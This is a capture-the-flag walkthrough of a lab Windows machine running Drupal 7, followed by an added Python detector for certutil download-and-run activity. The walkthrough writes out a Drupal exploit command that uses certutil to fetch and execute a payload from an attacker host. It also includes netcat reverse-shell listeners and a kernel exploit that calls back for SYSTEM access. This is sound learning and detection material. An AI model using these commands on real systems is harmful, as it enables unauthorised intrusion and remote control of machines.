Ping

ping 10.10.10.9

Nmap default Scan

nmap 10.10.10.9 -oN dnmap

Nmap Script and Service Scan

nmap 10.10.10.9 -sVC -oN snmap

Nmap all port Scan

nmap -p- --min-rate 10000 10.10.10.9 -oN anmap

On port 80

Got the version of Drupal in the source code

Also we can see this in CHANGELOG.txt

Will move to Initial Foothold…!

Will search for a public exploit for Drupal 7. Got one: https://www.exploit-db.com/exploits/41564

Will run the exploit

python3 exp.py http://10.10.10.9/ -c 'certutil -urlcache -f http://10.10.14.2/met.exe c:/windows/temp/met.exe'

python3 exp.py http://10.10.10.9/ -c 'C:/Windows/Temp/met.exe'

Will trigger the payload

rlwrap nc -nvlp 443
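
Added example (not part of the original write-up): a Python detector for the foothold pattern above, where certutil -urlcache fetches a file and the same file is then run from a path written with different case and forward slashes. The event tuples are constructed sample data, and the function names and the 300-second window are assumptions.

```python
import re
import shlex

# Constructed sample records (seconds, process command line); not real logs.
SAMPLE_EVENTS = [
    (100, "certutil -urlcache -f http://10.10.14.2/met.exe c:/windows/temp/met.exe"),
    (130, "C:/Windows/Temp/met.exe"),
    (200, "certutil -hashfile C:\\Windows\\Temp\\report.zip SHA256"),
    (260, "C:\\Windows\\System32\\whoami.exe /priv"),
]
URL_RE = re.compile(r"^(https?|ftp)://", re.I)
CERTUTIL_RE = re.compile(r"(^|[\\/])certutil(\.exe)?$", re.I)

def norm_path(p):
    """Windows paths ignore case and accept / or \\, so compare a canonical form."""
    return p.strip('"').replace("/", "\\").lower()

def split_cmd(cmdline):
    return shlex.split(cmdline, posix=False)  # posix=False keeps backslashes

def certutil_download(cmdline):
    """Return (url, normalised output path or None) for a certutil URL fetch, else None."""
    args = split_cmd(cmdline)
    if not args or not CERTUTIL_RE.search(args[0].strip('"')):
        return None
    flags = {a[1:].lower() for a in args[1:] if a[0] in "-/"}  # -opt and /opt both work
    rest = [a.strip('"') for a in args[1:] if a[0] not in "-/"]
    urls = [a for a in rest if URL_RE.match(a)]
    outs = [a for a in rest if not URL_RE.match(a)]
    if "urlcache" not in flags or not urls:
        return None
    return urls[0], (norm_path(outs[0]) if outs else None)

def find_download_then_run(events, window=300):
    """Alert on certutil downloads and on the downloaded file running within `window` s."""
    pending, alerts = {}, []
    for ts, cmd in sorted(events):
        hit = certutil_download(cmd)
        if hit:
            alerts.append(("certutil_download", ts, hit[0], hit[1]))
            if hit[1]:
                pending[hit[1]] = (ts, hit[0])
            continue
        args = split_cmd(cmd)
        image = norm_path(args[0]) if args else ""
        if image in pending and ts - pending[image][0] <= window:
            alerts.append(("downloaded_file_executed", ts, pending[image][1], image))
    return alerts
```

Without the path normalisation in norm_path, the second command would not be tied back to the download, because the two command lines spell the path differently.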

Will move to Privilege escalation…!

Will check our privileges

whoami /priv

Get System info

systeminfo

Though we have the Impersonate privilege, we can’t use PrintSpoofer or GodPotato, so will go with a kernel exploit

Found an exploit at this link: https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe

Will transfer the binary to the target machine and run the exploit

exp.exe 10.10.14.2 4444

rlwrap nc -nvlp 4444

Cooool….! We got Elevated.

Got user.txt in User dimitris’s Desktop

Got root.txt in Admin’s Desktop

I’m done with Bastard……:)